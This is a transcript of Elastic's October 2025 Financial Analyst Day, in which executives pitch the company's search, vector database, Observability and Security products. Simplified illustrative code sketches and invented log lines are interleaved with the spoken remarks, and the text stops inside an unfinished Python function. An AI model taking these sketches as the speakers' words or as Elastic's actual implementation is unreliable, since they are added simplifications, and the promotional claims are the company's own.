Elastic N.V. (ESTC)
NYSE: ESTC · Real-Time Price · USD

Financial Analyst Day

Oct 9, 2025

Eric Prengel
Global VP of Finance, Elastic

All right. Hello, everybody. Welcome to Financial Analyst Day. Now, before we begin, I want to get the obligatory disclaimer language out of the way. Today's event will be webcast and recorded for future playback. Information and risks pertaining to forward-looking statements, as well as reconciliation to our GAAP and non-GAAP results, are available in today's presentation materials, which will be posted on the investor website at ir.elastic.co at the conclusion of the event. With that out of the way, on to the fun stuff. For those of you who don't know me, my name is Eric Prengel, and I'm the Global Vice President of Finance at Elastic, as well as the Head of Investor Relations. I was an investment banker for a long time before joining the company almost three years ago.

I've known Elastic for a while because I worked on the IPO, and some of you worked on it with me. It was a lot of fun. Since joining, I've gotten to know the company a lot better, and I'm really looking forward to sharing with all of you what the team has built and all of the exciting things on the trajectory that we're on. It's great to have so many familiar faces together, and all in the place I grew up in, LA. Ash mentioned the Yankees. I went to the game last night. It was sad to see the loss, but they'll be back next year. We have a great program for you today. Ash is going to lead off and go through the opportunity. Ken, Steve, and Santosh are going to talk about product.

Mark is going to talk about go-to-market, and Navam is going to talk through the financials of the business. Unfortunately, Shay couldn't be here with us today due to a family health issue that he needed to attend to. He's regularly at Elastic{ON} events, and actually, if any of you are able to make it out to Amsterdam on October 30th, he will definitely be there. With that, I'm very excited to hand it off to our CEO, Ash Kulkarni.

Ash Kulkarni
CEO, Elastic

All right. Good afternoon, everybody. Thank you for joining us today. I'm going to kick things off. My job today is to set the stage, talk about our strategy, our vision, who we are as a company.

For those of you who might not be that familiar with Elastic, I want to make sure that you have a firm understanding of where we differentiate, the role that we play in the IT organizations of all of our customers, the opportunity that we have in AI, how we are helping customers in AI today, and what that means for our future. The rest of the agenda is going to be the product folks walking through the new product capabilities. We had six new product announcements today. We are going to have Mark talk about our go-to-market efforts and everything that we have done there, and finally, Navam bringing it home. With that, let's get started. The most important thing that you need to understand about Elastic is the role that we play in helping our customers deal with unstructured data.

We are the world's most popular data platform when it comes to unstructured data. Oftentimes when people say unstructured data, it's hard to know exactly what they mean by that. Take a look at a log file. A log file is effectively every developer leaving notes for their future selves to be able to go back and debug their own code. Typically, these messages tend to be very, very freeform. They tend to be very, very messy. The information in there is different from line to line. When you look at a log file like this, you can't put it into a regular database. It doesn't matter if it's a SQL database, it doesn't matter if it's a document database, it doesn't matter if it's a columnar store. You can't put this information into a rigid schema.
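To make that concrete, here are a few invented log lines of the sort being described. Note how the layout, fields, and structure shift from line to line:

```text
2025-10-09T14:02:11Z WARN payment-svc retry 3/5 for txn 9f2c41 (upstream timed out after 4012ms)
127.0.0.1 - - [09/Oct/2025:14:02:12 +0000] "POST /v1/charge HTTP/1.1" 502 173
ERROR BillingJob.run(BillingJob.java:212): NullPointerException -- did anyone fix JIRA-1044?
```

Three lines, three different formats: an application log, an Apache-style access log, and a stack-trace note a developer left for themselves. There is no single rigid schema a relational table could impose on all three.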

By definition, if you're looking for patterns in it, if you're trying to identify and sift through it, analyze it, you need a different paradigm. You need a search platform. That same thing applies even when you're dealing with freeform documents, Word documents, PDFs, all of these kinds of structures. They do not have a good schema. That's unstructured data. Because of our dominance in this area today, over the years, we've had over 5.5 billion downloads of our software. That's over three downloads a second over these 15 years, if you average it out. We have been ranked as the number one search engine and vector database according to DB-Engines. If you look at the GitHub stars, it clearly indicates the popularity that we have.

All of this is because, yes, we can deal with structured data, but most importantly, what we can do with unstructured data, with the power of relevance, is very specifically our greatest competitive advantage. Because of this, we have built a tremendous incumbency when it comes to this kind of information. We have estimated not just the data that is in Elastic Cloud, which we have clear access to and visibility into, but also the data that exists in paid Elasticsearch self-managed clusters around the globe. Every day, over 30 PB of new data gets ingested into Elastic paid clusters around the globe. 30 billion queries per day run just on Elastic Cloud. When we look at the total data that's under storage, it's well over 1.3 EB. That is incumbency.

This is unstructured data, and when that unstructured data gets utilized for AI, gets utilized for Observability, for Security, where do you expect people would go? The first place that they go is Elasticsearch. This data is already there. When they look to automate things using new modern AI techniques, we are the natural platform of choice. This incumbency is a huge advantage. As unstructured data has grown, so has our revenue. We have built a strong at-scale business. As unstructured data, which is the fastest growing type of data, has continued to expand, the most exciting thing that's happened is the fact that with the advent of LLMs, the importance of unstructured data has just grown manifold. You look at any application in the past, whether it was CRM systems, ERP applications, HCM systems, they were all built on structured information. Account ID, opportunity ID, customer name, etc.

All the notes that you put into your CRM system are just shoved in there. It's freeform text that you can't really analyze in any way. It's just an attachment that some human being has to read. Large language models have completely changed what you can do with unstructured data. Large language models are really the new operating system. We believe it. We believe it firmly. You program not using Java or C or Rust or Python, but you program using English. That's the amazing part about these systems. These systems are knowledge systems, but they are only as knowledgeable as the data they've been trained on. To use them within the enterprise, you have to provide them with context. You have to provide them with relevant data to be able to address the problem that they're trying to address.

AI fundamentally depends on data, on being able to have access to it, and relevance is key to making any AI system actually worthy, production-grade. This is right in our wheelhouse. AI has literally come to us. It has made unstructured data more interesting, more valuable. This is what we've always been known for. This is what we were created for as a company: the ability to ingest and bring in all of this unstructured information, index it, make it searchable, and allow you to run all kinds of interesting algorithms and ML queries on top of this data. This is what we have always been good at. This is what is really needed to build new AI experiences. We've been working on this ever since the company was formed. Relevance is not a new concept for us. From the earliest days, it was all about relevance.

It was all about trying to figure out how to make sure that you can surface the most relevant information for the search query that you were firing at Elasticsearch and surface that. Over the years, we continued investing in machine learning, in AI. When it was clear that transformer models were going to be an interesting thing, we started investing in building out our vector database well over five years ago. Since then, we have made our vector database more and more capable, highly scalable. Today, we have customers that are using it to store and retrieve billions of vectors at scale in a very high-performance way with great efficiency. We built our own embedding and retrieval models. We built our own re-ranking models. We added additional capabilities like MCP tools. We are working on GPU-based acceleration with NVIDIA.

There's a lot that we have been doing in this area. This is not something that we just woke up and decided to do a year ago. This has been in the making because unstructured data has been at the core of what we've always done. Today, we feel confident that we have the best platform for context engineering. Now, what is context engineering? If you ask ChatGPT, which is what you should do, it'll tell you that context engineering is the techniques involved in ensuring that you provide the right data and the right tools to a large language model to allow it to do its job accurately. The right data and the right tools. That takes more than just a vector database. Of course, you need a vector database when you're dealing with data that might not easily be searched through textual techniques.

Also, if you want to do things like semantic search, but you need more than just a vector database. You need to be able to deliver hybrid search. You need to be able to ensure that you can actually verify the outputs. Have a playground. You need LLM Observability. You need embedding models that you're constantly tuning and improving relevance with. All of this becomes critical. Why do we win? We win today because of these three broad reasons. First and foremost, like I said, we have been investing a lot in making our vector database and our overall retrieval platform the absolute best when it comes to speed, scale, and efficiency. I'll talk a little bit more about that, but more importantly, the team's going to go into it and actually go into the details.

In the past, we've talked about things like better binary quantization, BBQ, which allows you to manage vectors in a much denser way. You're having to use much less memory and CPU. We've talked about capabilities like ACORN, a new filtering algorithm that allows us to improve query performance because any search always happens with some amount of filtering. You don't search for restaurants, you search for restaurants in a particular neighborhood. In a particular neighborhood is a filter. You need to be able to do that efficiently. That's what we do incredibly well. The second reason why we win is relevance. We have put a lot of effort and energy into optimizing our models for relevance.
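The restaurant example maps directly onto a filtered vector search. As a rough sketch (the index and field names here, such as `menu_vector` and `neighborhood`, are invented for illustration, and the exact request shape varies by Elasticsearch version), a kNN search body with a structured filter might look like this:

```python
# Sketch of a filtered kNN request body of the kind sent to an
# Elasticsearch _search endpoint. All names are hypothetical.
def filtered_knn_query(query_vector, neighborhood, k=10, candidates=100):
    """Find the k nearest restaurants by embedding similarity,
    restricted to one neighborhood. The filter is applied as part of
    the vector search itself, which is the kind of work ACORN-style
    filtering is designed to speed up."""
    return {
        "knn": {
            "field": "menu_vector",        # dense_vector field
            "query_vector": query_vector,  # embedding of the user's query
            "k": k,                        # results to return
            "num_candidates": candidates,  # candidate pool per shard
            "filter": {                    # structured constraint
                "term": {"neighborhood": neighborhood}
            },
        }
    }

body = filtered_knn_query([0.12, -0.08, 0.33], "mission_district")
```

The design point being made in the talk is that the `filter` clause is evaluated during the vector search rather than by over-fetching unfiltered candidates and discarding most of them afterward.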

We don't just do this using vector search, but with the re-rankers that we've built, the ability to use multiple techniques, hybrid search, semantic search, and then on top of it, to use re-ranking to get the best possible output, the most relevant data. Lastly, because we have assembled all of the tooling that you need to be able to build these chatbots, these agentic workflows, these agents in an efficient manner. This morning, we made two announcements in this area. The first is a new capability called Agent Builder, and the team's going to demonstrate this. You know, if data is the most important aspect for context, wouldn't you want to start with the data as you're building these agents?

How do you start directly on top of your data with almost a conversational experience, explore your data, and assemble the right tools that you need to quickly build a complete agent with workflow capabilities and everything that is needed? A completely different approach that's truly relevance-centric, that's all about context engineering. The second thing that we announced is the Elastic Inference Service. This is our own GPU-accelerated service in Elastic Cloud where we make it possible for our users to get access to our embedding models, our retrieval models, our re-ranking models, and over time, more and more models that we'll deliver. You have everything that you need, not just for Agent Builder, but even outside of it, through this easy API. We also announced this morning our acquisition of Jina AI. We have been partnering with Jina for a long time.

Our ELSER model is a world-class sparse encoder model, but it was English only. With Jina, we get access to an amazing multilingual and, most importantly, multimodal set of models, both for retrieval as well as re-ranking. When you look at any document, most documents will often have multiple types of information in them. Some text, but also images. If you are dealing with a single-mode model, you would need to break up that information, separate the text from the images, run it through two separate models, and chunk it up differently. It just makes the whole system extremely complicated, and you don't get the relevance, the accuracy that you need. With a multimodal approach, like what Jina has been able to do, you can put all of that information through a single model and get exactly what you need.

This is going to be available through our inference service and will be available to our customers as we integrate it. This team of researchers has done remarkable work; they do a lot of work with academia, and they've published a lot of reports about the relevance quality that they're able to generate. We are very excited about what this brings to Elastic. This is allowing us to win the kinds of customers and have the kinds of customer successes that we are incredibly proud of. I wanted to just talk about a few of these examples. The first is Docusign. The reason they chose Elastic was because they were trying to build what they call their intelligent agreement management platform, a new service that they're delivering to their customers. They want to go beyond just being able to sign documents.

For that to work, they needed to have some ability to be able to search across each and every document, literally many, many billions of documents that are in the Docusign store. How do you make that possible across the different modes of data like we talked about, at scale with immense relevance? We were the only ones in their testing that they found capable of doing it. Legora, an AI-native company, it's all about how do you use AI to improve the process by which lawyers are able to do research on case law, write drafts, optimize those drafts, do their work better and faster. They chose us because of the quality of relevance. When you're dealing with legal case law, the kinds of semantics involved are very specific. You need to understand those semantics. They found that the relevance quality that we were able to deliver was amazing.

Another example I'll touch upon is the National Health Service in the U.K. They use Elastic as the platform for bringing in all of their patient records and being able to search across them for helping doctors decide what's the best next step in terms of the procedures that they want to recommend, helping their doctors work faster, more efficiently. They chose Elastic not just because of our scale, not just because of our relevance, but also because we were the only platform that had the very fine-grained document-level permissions that gave them the confidence that it would not violate patient privacy rights. We are the only platform that has the ability to do all of this. What's interesting when I look at this slide is, first, the variety of customers. We are not looking at just customers that are AI-native companies. Looking at ISVs like Docusign and Seismic.

Looking at agencies like the National Health Service. That breadth is what gives us tremendous strength. This is diversified. The second thing that I'll call out is these use cases are very durable use cases. This is not experimentation. The National Health Service is not trying to experiment with people's health. You know, Legora, their whole business model is built on this. Docusign, the entire new business that they created, is dependent on this. These aren't experiments. These are durable use cases. The last thing I'll call out is just the fact that they had a very clear understanding of the differentiation and the competitive advantages that Elasticsearch has that made us the only right choice for their needs: scale, relevance, and the ability to do everything in one single platform. You look at the numbers of customers that we have today. You know, I look at that middle box.

That represents about 20% of our customers in the cohort that is paying us over $100,000 a year. That's 20%. That tells me two things. One, that there is a tremendous opportunity still ahead of us because we still have 80% of that population to go after. Second, that each of these companies, even the companies listed here, they have built one really amazing application on our platform that's AI-centric. That's just the first. There's so much more that they are planning to do, intending to do, and we are in such a great place as part of their infrastructure for AI that we feel very excited about what this means for the future. Now, I'm going to shift gears a little bit. Everything that I've talked about so far has been about search. What does this mean to our Observability business?

First, why did we even get into Observability as a company? I'll take you back to what I started with. We are the best data store for unstructured, messy data. Observability data tends to be incredibly messy. Logs are the messiest form of machine-generated information. Our ability to get into this entire space started with the functionality that we delivered in log analytics. Over the years, we've assembled a complete platform, everything from infrastructure monitoring, APM, AI Ops, real user monitoring, and more. The reason why we win today are these three. The first thing is very simply what you see at the bottom. We have the best data store, and we continue to invest in this.

We have the best data store, capable of ingesting every possible type of signal needed for Observability in one single store, allowing you to run complex correlations. It lets you see the links from, you know, the infrastructure showing you that the CPU is running hot, to understanding the specific services and application components that might be falling behind, to then getting to the relevant logs, the specific logs related to those issues, to then being able to diagnose the root cause. Having one optimized data store matters, and we have built distinct specialized backend stores within Elasticsearch for logs, for time series data like metrics, and so on. We can store each of these data types efficiently and still get you correlations across all of it using a singular query language, ES|QL. The second reason why we win is because of our big bet on open standards.
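That hot-CPU-to-error-logs correlation is the sort of thing ES|QL is meant for. A hypothetical sketch (all index and field names are invented, and conditional counting via CASE is just one idiom; check the ES|QL reference for your version) that ranks hosts by CPU while counting their recent error logs in the same query might look like:

```esql
FROM metrics-*, logs-*
| WHERE @timestamp > NOW() - 15 minutes
| STATS max_cpu = MAX(system.cpu.total.pct),
        errors  = SUM(CASE(log.level == "error", 1, 0))
  BY host.name
| SORT max_cpu DESC
| LIMIT 10
```

One query, one store, two signal types: no export step and no join across separate monitoring products.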

Observability is a mess, generally because of the fact that in the past, none of the data was ever normalized. It was really hard to do any kind of correlation. OpenTelemetry has started to change that in a very material way. We leaned in hard because with the open standards that OpenTelemetry provides, we can now have an OTel-native way all the way from collecting data with OTel collectors and OTel SDKs, all the way to an OTel-native backend schema. Incidentally, we donated our Elastic Common Schema to the OpenTelemetry project, and their common schema for logs is based directly off of Elastic's common schema. What that means for our customers is when they use OTel to bring in the data, the dashboards automatically light up. The data is naturally correlated with each other. That is a huge advantage.

Lastly, because we have been using AI more aggressively than anybody else to help with investigations when you are dealing with any kind of issue in Observability. When you're dealing with Observability, the things that matter most are mean time to detection and mean time to resolution. How quickly can you spot the problem? How quickly can you understand the root cause? How quickly can you do something about it? Toward that end, the fourth big announcement that we made earlier today was something called Streams & Significant Events, and the team will demonstrate this. It uses AI to automatically help you get all the richness and all the information that exists in logs, because logs have always been the last port of call. That's where every developer goes at the end when they want to root-cause exactly what line in their code is causing issues.

It has never been the first port of call because logs are hard to work with. They require you to do a lot of work. You have to write a lot of grok rules. You have to parse the data. You have to bring it in. You got to write the right alerts. What if AI could do all of that for you? That is what Streams & Significant Events does. It automatically uncovers what's important in your log data. Our customers are showing with their faith in us that our approach is the right approach. We've talked a lot in the past about our land and expand strategy. This just gives you a sense of how much progress we've made even within the subcomponents of Observability. We always start with log analytics. Over 90% of our Elastic Cloud observability customers use us for log analytics.
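For a sense of the manual toil being described, here is a single hand-written parsing rule of the kind grok patterns encode, for one invented log format. Every new format a team onboards traditionally needs another rule like this, which is exactly the work Streams aims to automate:

```python
import re

# One parsing rule for one invented log layout: pull timestamp, level,
# service, and message out of lines shaped like
#   2025-10-09T14:02:11Z WARN payment-svc upstream timed out after 4012ms
LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z)\s+"
    r"(?P<level>[A-Z]+)\s+"
    r"(?P<service>\S+)\s+"
    r"(?P<message>.*)$"
)

def parse(line: str) -> dict:
    """Structure a log line if it matches this format; otherwise keep
    the raw text so nothing is silently dropped."""
    m = LINE.match(line)
    return m.groupdict() if m else {"message": line}

event = parse("2025-10-09T14:02:11Z WARN payment-svc upstream timed out after 4012ms")
```

Multiply this by every service, every format change, and every alert that has to be written against the parsed fields, and the appeal of having AI infer the structure becomes clear.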

What most people might not realize is over 35% of our Cloud observability customers use us for what I describe as beyond logs: APM, infrastructure monitoring or metrics, AIOps, and so on. This shows that our land and expand motion is working. It's proven. There is also a lot more room for us to keep growing. This is what's exciting for us. That same approach also applies to Security because if Observability is a data problem, Security is 10 times more so. You literally miss every single threat in the data that you don't ingest, analyze, and alert off of. Security is absolutely a data problem. That's why we started with SIEM, because we have the world's best platform for unstructured data. All of that Security telemetry is unstructured. It's network logs. It's application logs. It's identity and access management logs. It's web logs. It's telemetry from endpoints.

It comes in so many different shapes and sizes. Being able to bring it all together and actually do analytics on it is a data problem. Yes, we've invested a lot in first-party threat research and so on. Make no mistake, Security is fundamentally a data problem. By starting with SIEM, we then, over time, have expanded beyond it, adding EDR and XDR functionality, adding cloud detection and response functionality, adding UEBA or entity analytics. The reason why we win, and you'll see the themes here: first and foremost, at the bottom, the best SIEM data store when it comes to being able to bring in all of this network telemetry at speed, at scale, very flexibly, irrespective of your deployment type, in the cloud or on-prem, and do threat hunting across all of your data.

The second reason, we have truly used AI more aggressively in Security than anyone else. Attack Discovery, the functionality that we released a year and a half ago, which is now being used very widely across our entire Security portfolio by our customers, takes away the job of an analyst to try and sift through all of the alerts and figure out what are the real attack patterns in there. The AI does it for you. The third reason, the ability to not just unify all of the signals, but then to act on it, to remediate. I'm going to touch upon that in a second. The fifth big product announcement that we made earlier today was this. We announced Elastic Workflows. This was the acquisition of Keep that we made about six or seven months ago. We have very quickly integrated that functionality directly into the platform.

Now, not only do you get security alerts, not only can you do threat hunting in the platform, but you can create the remediation workflows. Depending upon how automated or semi-automated you want those remediations to be, you can fire them off. Complete case management, complete workflows, stateful, everything. Incredibly powerful. Our customers are proving that we are the right choice. Over 95% of our Elastic Cloud Security customers use us for SIEM. This is where we land. Just like in Observability, we land with log analytics. In Security, we land with SIEM. What most people might not realize is that over 20% of these Elastic Cloud Security customers are using us for what I call beyond SIEM. They are using us for EDR and XDR use cases. We do not lead with EDR, but we expand with EDR when we are in.

Those endpoints that are bringing in the data required for SIEM have the functionality built in for things like ransomware protection, for things like host isolation. Once that agent is deployed, all the customer needs to do is turn on the configuration flag. That is how we expand. That is how we grow our consumption. I have talked about land and expand over and over again. I will try and put it in a visual form for all of you. What is great about Elastic is, given that we have had such strong roots in open source, it is really hard for me to meet a prospect, somebody who has never done business with us, where there is not somebody who is already familiar with Elasticsearch, is actively using Elasticsearch. Maybe the community edition, the free edition, that is fine. They already know us. They are already champions in there.

Awareness starts through our open-source roots. When we land, when we have the first transaction with a customer, it happens in one of two ways. Either the self-service motion, if it is an SMB customer, they just come to monthly cloud and they start using us that way. It is typical for our SMB cohort. Our sales-led efforts, where we go after the enterprise and mid-market accounts. After we have that first land, we focus on customer usage. Mark will touch upon this. We have a customer architect team that focuses just on this. They are engineers who work with our customers to make them successful with that implementation. When that implementation is successful, consumption starts to fly, the flywheel spins. Because as they do that, the next natural thing then with the customer is a conversation about how else can we help you.

Just as I talked about beyond logs and beyond SIEM, we then go from one solution to an additional solution. That's how we grow. Customers adopt higher tiers if they want our AI Assistant, if they want searchable snapshots, these capabilities that we put in the premium enterprise tier, and on and on. Another thing that's important about Elastic is the fact that we have been very disciplined about making sure that we meet our customers where they want us to be. We have, of course, Elastic Cloud Hosted and Elastic Cloud Serverless, but also the self-managed offering. That gives us tremendous advantages. There are lots of customers, even today, who want to run AI workloads in their own data centers because the data is regulated information that they don't want to put in the cloud. That gives us an asymmetric advantage.

We're one of the few that can do this. All of this taken together has set us up in such a great way in a market that has a massive total addressable market. We are very excited about this. We can see the recognition that we've been getting and earning from analysts. In the most recent reports, we are now a leader in each of the areas that we play in, according to Gartner and Forrester. We didn't have this five, six years ago. We still have so much headroom ahead of us. That box on the bottom right, I always think about that. We have over 50% of the Fortune 500 companies as customers. That means there's almost another 50% that we can go and get. That is exactly what Mark and his team are focused on from a go-to-market motion.

The work that they have done in the last 18 months, transforming our execution, making it more predictable, making it more consistent, is something that I'm very, very excited about. What I'm most excited about is the fact that as we've been able to improve our efficiency, improve our productivity, we are very confident that even as this engine is humming, there is still more room for optimization. I know that we can continue to do even better. That's exciting. I'm going to bring it home. You know, we are not chasing AI hype. AI is really a wave that has come to us because of the role that we've always played with unstructured data. That's what our customers know us for. That unstructured data has now become incredibly exciting and important. It is what's fueling a lot of the work that's going on in AI.

That just means that we have a natural seat at the table. That just means that we have a natural advantage, an incumbency that we are taking advantage of. If I leave you with these five pillars, I think that's the most important way to think about Elastic. We are trusted by developers all over the globe. We are trusted by enterprises. We have clear Gen AI leadership. Analyst recognition is only helping us do this more efficiently with our go-to-market motion. Lastly, we've been able to consistently deliver strong financial performance. I'm going to hand it over to Ken to really take us through the products. Ken.

Ken Exner
Chief Product Officer, Elastic

Hey, folks. Thank you for being here. I get to do what I love now, which is talk about products. I'm going to begin with a point that Ash made earlier. Ash was talking about the explosion of data that we're seeing, especially unstructured data. This is something I see all the time when I talk to customers. They're talking about how much data they have, how hard it is to manage it, how much that data is growing all the time. It's not just the volume, the amount of data that they're struggling with. It's also that it's siloed across the enterprise in a mix of structured and unstructured formats. Even when it's structured, it tends to be different schemas. They're dealing with all this messy, siloed data. They also know that in the age of AI, this data, this unstructured, messy data suddenly has new value.

If they could put it to work, if they could use this together with generative AI and agentic AI systems, this messy, unstructured, siloed data has new value. How do they do that? Enter Elastic and the Elasticsearch platform. For years, we've been helping customers get more value out of data. No matter how messy that data is, no matter how siloed, no matter what type of data it is, we help customers get value out of data. In the age of AI, that means helping them build AI experiences on top of that data. In a few minutes, Steve and Santosh are going to walk you through the search AI, Observability, and Security businesses that build on top of this platform. I want to talk about the platform itself, the Elasticsearch platform, because I think that is why we win. Very simply, we win because of the Elasticsearch platform. Period.

For me, this means three things, though. One, it's a world-class data store. It's a blazing-fast data store. It is highly performant. It is highly scalable. Customers always know us for being the search engine, but they sometimes forget that we're also a data store. I would argue not just any data store, but the best data store for unstructured data. Second, we're the leader in relevance. As a search engine, as a vector database, as a context engineering solution, we excel at relevance. We're the leader in relevance. No one has a deeper set of capabilities than us for getting relevant context out of data and presenting that context to other systems. No one has more customers. No one has been doing this longer than us. We are the leaders in relevance. Third, we win because we win with developers.

We are loved by, and we are built for, developers. Developers worldwide, millions of developers have used Elasticsearch over the last 15 years. We have deep roots in open source. Because of these deep roots in open source, we've built out a huge community that takes Elasticsearch into the enterprise where we're able to convert into paying customers. Let's unpack this a little bit, beginning with why we win as a data store. It starts by supporting all the data. It doesn't matter what kind of data it is. The Elasticsearch data store supports everything. It could be metrics, traces, IoT data, product telemetry, or business data. Any type of data, structured or unstructured, we support that.

One of the things that I think is really, really unique about us is that we support the type of capabilities that are typically only supported by structured data stores, but for unstructured data. Let me give you an example of what that means. It means that we can combine all this data together, even though it is not the same format, not the same schema, even if it's different types of data, even if it's unstructured. We can do things that are typically only possible with structured data tools. For example, you can join data. Using ES|QL, our query language, you can literally do joins on two different data sets that not only have different schemas, but are unstructured. You can create fields on the fly. You can do math operations on unstructured data. You can do sorting and filtering.
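
To make the join idea concrete, here is a minimal Python sketch of what a lookup-style join does conceptually, with a hypothetical ES|QL query in the comments. The index names (`app_logs`, `host_inventory`) and fields are invented for the example, not taken from the talk.

```python
# Conceptually, an ES|QL query along these (hypothetical) lines joins two
# indices with different schemas on a shared key:
#
#   FROM app_logs
#   | LOOKUP JOIN host_inventory ON host.name
#   | WHERE status == "error"
#
# A pure-Python equivalent of that lookup join:
def lookup_join(left_rows, right_rows, key):
    """Enrich each left-side row with matching fields from the right dataset."""
    lookup = {row[key]: row for row in right_rows}
    joined = []
    for row in left_rows:
        match = lookup.get(row.get(key), {})
        joined.append({**match, **row})  # left-side fields win on conflict
    return joined

logs = [
    {"host.name": "web-1", "status": "error", "message": "timeout contacting db"},
    {"host.name": "web-2", "status": "ok", "message": "served request"},
]
inventory = [
    {"host.name": "web-1", "region": "us-east", "owner": "payments"},
    {"host.name": "web-2", "region": "eu-west", "owner": "checkout"},
]

enriched = lookup_join(logs, inventory, "host.name")
errors = [r for r in enriched if r["status"] == "error"]
print(errors[0]["region"])  # -> us-east
```

The point of the sketch: the two datasets have different shapes, and the join key is all they share, which is the kind of cross-dataset operation usually reserved for structured stores.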

These are things that are typically not done with unstructured data, but you can do that with the Elasticsearch platform. If you want to run ML jobs or AI or various types of analytics on this, it doesn't matter that the data is all kinds of different formats. It doesn't matter if it's unstructured. You can run that across this. You can run correlation analysis. You can run anomaly detection, not just on metrics and traces, but also on business data. No one else can do this. It's not just that we support any type of data that makes us a special world-class data store. It is also because we have a reputation for being incredibly fast, highly scalable, and highly performant. It's not a reputation that we take for granted. We are constantly reinvesting and making sure we are highly efficient and highly performant and highly scalable.

Typically, there are two types of investments we make. Sometimes they're data-type specific. We have types of improvements that we do to make logs really great on Elastic, to make metrics or vectors really great. For example, over the past year, we introduced LogsDB and TSDB. Both of these improvements are delivering 70% storage efficiency for our customers over previous versions. We've also been doing a lot of work in vectors. Ash mentioned BBQ, better binary quantization, my favorite product name. It is a type of compression for vectors. What it does is it allows customers to have huge savings in terms of memory footprint and in terms of storage. You get 95% efficiencies in terms of memory. Not just that, it also improves performance. It's actually made us five times faster than OpenSearch with their default quantization techniques.
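
To give a feel for where the memory savings come from, here is an illustrative 1-bit quantization sketch. This shows the general idea behind binary quantization of vectors, not Elastic's actual BBQ algorithm (which keeps correction factors alongside the bits to preserve accuracy); all names here are invented for the example.

```python
def binarize(vec):
    """Collapse each float dimension to a single sign bit.

    A 1024-dim float32 vector (4,096 bytes) becomes 1,024 bits (128 bytes),
    a 32x reduction in raw size -- the ballpark of the memory savings
    quoted above, before correction factors are added back.
    """
    bits = 0
    for i, x in enumerate(vec):
        if x > 0:
            bits |= 1 << i
    return bits

def hamming(a, b):
    """Distance between two binarized vectors: count of differing bits.

    XOR plus popcount is extremely cheap, which is one reason quantized
    search can be faster as well as smaller.
    """
    return bin(a ^ b).count("1")

q = binarize([0.4, -1.1, 2.3, -0.2])   # -> 0b0101
d = binarize([0.9, 0.1, 1.7, -3.0])    # -> 0b0111
print(hamming(q, d))                   # -> 1
```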

Sometimes the improvements that we do on our data store affect all data in Elastic. For example, the work that we're doing with NVIDIA to do GPU acceleration of all data in Elastic, or the work that we've done on a data lake architecture. Over the last few years, we introduced a new data lake architecture. It's built on object storage like other data lakes. Unlike other data lakes, you don't have to compromise performance. We are the only data store that allows you to have blazing-fast performance, real-time performance. You can build real-time applications, latency-sensitive applications on top of our data lake. You get the durability of object storage. You get the scalability. You get the efficiency of object storage. You don't have to compromise performance. Only we can do that. You can't talk about Elastic without talking about search. You can't talk about search without talking about relevance.

We are the leader in relevance. We're especially good when it comes to finding context and intelligence in any data, no matter whether it's structured or unstructured. If you have structured data, like you have a table or a relational database, there are plenty of good tools that you can use to query that data. If you have unstructured data, what do you do? For example, if you have petabytes of logs, those logs might be different schemas. Even if it's the same schema, that same schema is going to have a mix of structured and unstructured content. How do you sift through that? How do you find that needle in the haystack that could end up being a security vulnerability? You need a great search engine.

If you have a huge repository of documents or PDFs, like what our customer Docusign has, and you want to do semantic search on that, or you want to build generative AI applications on top of that, how do you do that? These documents usually are opaque documents. Even if it's not opaque, it's usually a mix of structured and unstructured formats. What you need is a vector database. You need a semantic search system. You need a retrieval system, a great retrieval system. What makes a great search engine? What makes a great retrieval system? It's relevance. Relevance is at the heart of doing search and retrieval right. Relevance has always mattered, but I think it matters even more in the age of AI. Back when we were mostly focused on returning results to a user, like 10 blue links, you didn't want bad search results, right?

You wanted good search results. There's a human there that can interpret those results, so you had room for error. In the age of AI, you're not going to get 10 results. You're not going to get 100 results. You're going to ask a question of an LLM or an agent, and you're going to get one answer. Hopefully, that one answer is right. For it to be right, that agent, that LLM has to be grounded in the right data, has to have the right context. It gets even more interesting and more worrisome when you get into agentic AI. When you get into agentic AI, now it's not just answering a question. Now that AI, now that agent is performing an action. It's doing a task and potentially doing it badly.

The consequence of not grounding that LLM or that agent, not giving it the right context, could be destructive, could be damaging. This is why I think relevance matters so much in the age of AI, why context engineering as a concept is going to be talked about constantly as people move forward with agentic AI, because it's all about having relevance. It's all about having context. That's what you need to do AI correctly. The vector database companies have been saying that the answer to this problem is a vector database, and it is to an extent. I'm saying this as a vector database company. You know, we were one of the first vector databases out there. We are the most downloaded vector database. We are the best vector database. I also know that vectors are not enough. Vectors are not enough.

It is not enough to simply store and query vector embeddings. You have to do a lot more. For one, you have to help customers prep data and ingest data. They're going to have all kinds of different data stores that you're going to need to help integrate, pull data from different places. You're going to have to parse that data. You're going to have to figure out a chunking strategy for how you're going to chunk that in order to create the vector embeddings. To create vector embeddings, you're going to need a model, an embedding model. Hopefully, it's not just a single language embedding model, but maybe a multilingual embedding model, maybe a multimodal embedding model. It doesn't stop there. Because now you need to work on retrieval.
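
As one concrete example of the chunking step just described, here is a minimal fixed-size sliding-window chunker. Real pipelines often chunk by sentences, paragraphs, or tokens instead, and the size and overlap values here are arbitrary.

```python
def chunk(text, size=200, overlap=50):
    """Split text into overlapping windows before embedding each one.

    Overlap keeps a sentence that straddles a chunk boundary present in
    at least one chunk, so its meaning survives into the vector space.
    """
    step = size - overlap
    chunks = []
    for start in range(0, max(len(text) - overlap, 1), step):
        chunks.append(text[start:start + size])
    return chunks

doc = "x" * 500
pieces = chunk(doc)
print(len(pieces))                         # -> 3
print(pieces[0][-50:] == pieces[1][:50])   # -> True (the overlap)
```

Each chunk would then be passed to an embedding model to produce one vector per chunk.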

One of the things that we have learned is that to get relevance right, you have to combine different techniques here. It is not enough to just do vector search. You're usually combining vector search and lexical search, or doing graph traversal, or you're doing geospatial search, or filtering and faceting, like Ash talked about. If you're combining different data sets, you're going to need to do re-ranking using a re-rank model. These are all the different techniques that you use for tuning relevance. If you're going to tune relevance, you're going to need a way to evaluate results and make sure that you're getting the right results from that tuning of relevance. How do you do that? You need to have A/B testing. You need to have a framework for doing this evaluation. You're going to want to take this application to production.
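
One common way to combine a lexical result list with a vector result list is Reciprocal Rank Fusion, the technique behind Elasticsearch's hybrid `rrf` retriever. A minimal sketch, with document IDs invented for the example:

```python
def rrf(ranked_lists, k=60):
    """Reciprocal Rank Fusion: score(d) = sum over lists of 1 / (k + rank).

    Documents that rank well in several lists (e.g. both BM25 and vector
    search) float to the top; k=60 is the constant from the original RRF paper.
    """
    scores = {}
    for results in ranked_lists:
        for rank, doc_id in enumerate(results, start=1):
            scores[doc_id] = scores.get(doc_id, 0.0) + 1.0 / (k + rank)
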